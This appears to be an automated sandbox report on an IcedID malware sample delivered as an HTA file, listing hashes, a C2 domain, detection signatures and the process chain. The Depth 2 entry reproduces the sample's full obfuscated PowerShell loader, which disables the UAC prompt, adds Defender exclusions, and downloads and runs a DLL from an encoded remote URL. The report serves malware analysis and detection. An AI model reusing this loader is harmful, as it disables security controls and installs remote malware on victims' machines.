Analysis
- max time kernel: 599s
- max time network: 611s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 23-06-2022 16:06
- Static task: static1
- Behavioral task: behavioral1
- Sample: etest.hta
- Resource: win7-20220414-en
General
- Target: etest.hta
- Size: 99KB
- MD5: 84df3cea303f0410a2a70580b9155bf5
- SHA1: 987eed81fa0822853cb9f826994e75102e086694
- SHA256: 248b6a65b656872525904122e75bd374b772e27c2a8fc6040ec6582fd207e536
- SHA512: 610b39ec2989225794d0b12ef451bddc4bc4f3f77cd2159d9396ca425524256f17ea12b17957070a94704b5aa1a0b5fe5f915dd9d3c610aecc767315e1977616
Malware Config
Extracted
- Family: icedid
- Campaign ID: 3289900935
- C2: ilzenhwery.com
Signatures
- UAC bypass
  Process: powershell.exe
  Description: Set value (int)
  IoC: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"
- suricata: ET MALWARE Win32/IcedID Request Cookie
- suricata: ET MALWARE Win32/IcedID Request Cookie
- Blocklisted process makes network request (2 IoCs)
  flow 12, pid 1896, powershell.exe
  flow 28, pid 4072, rundll32.exe
- Downloads MZ/PE file
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  Process: mshta.exe
  Description: Key value queried
  IoC: \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation
- Loads dropped DLL (2 IoCs)
  pid 4932, rundll32.exe
  pid 4072, rundll32.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  pid 1896, powershell.exe
  pid 1896, powershell.exe
  pid 4072, rundll32.exe
  pid 4072, rundll32.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Description: Token: SeDebugPrivilege
  pid 1896, powershell.exe
- Suspicious use of WriteProcessMemory (8 IoCs)
  PID 3792 (mshta.exe) wrote to memory of 1896 (powershell.exe), 3 times
  PID 1896 (powershell.exe) wrote to memory of 4932 (rundll32.exe), 3 times
  PID 4932 (rundll32.exe) wrote to memory of 4072 (rundll32.exe), 2 times
Processes
- Depth 1: C:\Windows\SysWOW64\mshta.exe
  Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\etest.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
- Depth 2: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function BpCExIjDrdGi($nnVDyzh, $cfMRXTCG){[IO.File]::WriteAllBytes($nnVDyzh, $cfMRXTCG)};function BgqJOAPBzie($nnVDyzh){if($nnVDyzh.EndsWith((fibYakKGHnxcX @(66842,66896,66904,66904))) -eq $True){rundll32.exe $nnVDyzh ,RunObject }elseif($nnVDyzh.EndsWith((fibYakKGHnxcX @(66842,66908,66911,66845))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $nnVDyzh}else{Start-Process $nnVDyzh}};function YDwYoXfkvCiX($BUsiXmWVUTyBGlhNN){$uTDDSkKDrMcCukgsB = New-Object (fibYakKGHnxcX @(66874,66897,66912,66842,66883,66897,66894,66863,66904,66901,66897,66906,66912));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$cfMRXTCG = $uTDDSkKDrMcCukgsB.DownloadData($BUsiXmWVUTyBGlhNN);return $cfMRXTCG};function fibYakKGHnxcX($ZPSYkAbHDFF){$vRDpSXA=66796;$ifTikh=$Null;foreach($efauSZiRIFLSvo in $ZPSYkAbHDFF){$ifTikh+=[char]($efauSZiRIFLSvo-$vRDpSXA)};return $ifTikh};function KTcwOeFIaImkX(){$kyNirfktEagoeXnmMr = $env:AppData + '\';Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0;$nGDxbpOvNNZvVHtpfa=$env:AppData; Add-MpPreference -ExclusionPath $nGDxbpOvNNZvVHtpfa;Add-MpPreference -ExclusionExtension ?lnk?;$PkAZgfWOTxnZ = $kyNirfktEagoeXnmMr + 'test.dll'; if (Test-Path -Path $PkAZgfWOTxnZ){BgqJOAPBzie $PkAZgfWOTxnZ;}Else{ $SpgGVjW = YDwYoXfkvCiX (fibYakKGHnxcX @(66900,66912,66912,66908,66911,66854,66843,66843,66915,66893,66906,66899,66841,66896,66893,66912,66893,66841,66911,66895,66901,66897,66906,66895,66897,66842,66895,66907,66905,66843,66915,66908,66841,66895,66907,66906,66912,66897,66906,66912,66843,66912,66900,66897,66905,66897,66911,66843,66911,66895,66893,66908,66897,66911,66900,66907,66912,66843,66912,66897,66911,66912,66842,66896,66904,66904));BpCExIjDrdGi $PkAZgfWOTxnZ $SpgGVjW;BgqJOAPBzie $PkAZgfWOTxnZ;};;;;}KTcwOeFIaImkX;" uac
  - UAC bypass
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
- Depth 3: C:\Windows\SysWOW64\rundll32.exe
  Command line: "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\test.dll RunObject
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
- Depth 4: C:\Windows\system32\rundll32.exe
  Command line: "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\test.dll RunObject
  - Blocklisted process makes network request
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
Downloads
- C:\Users\Admin\AppData\Roaming\test.dll
  Filesize: 858KB
  MD5: f0b052dad1a3605cd3e6d044cd315388
  SHA1: fe3d8f50b494f400bd47842d580343f38be6a04b
  SHA256: 4798655c9e1df924b92d224c53dce0e3e9028318a5fa6ee4e6bd9f0f32154cdd
  SHA512: c8ee79ae9739c1486f0a89039b69afa6057d34bf39d2be58187d265662066c052776627fa58aa519e98c072704437fc3eaa190923e351414ef9a149509ff716b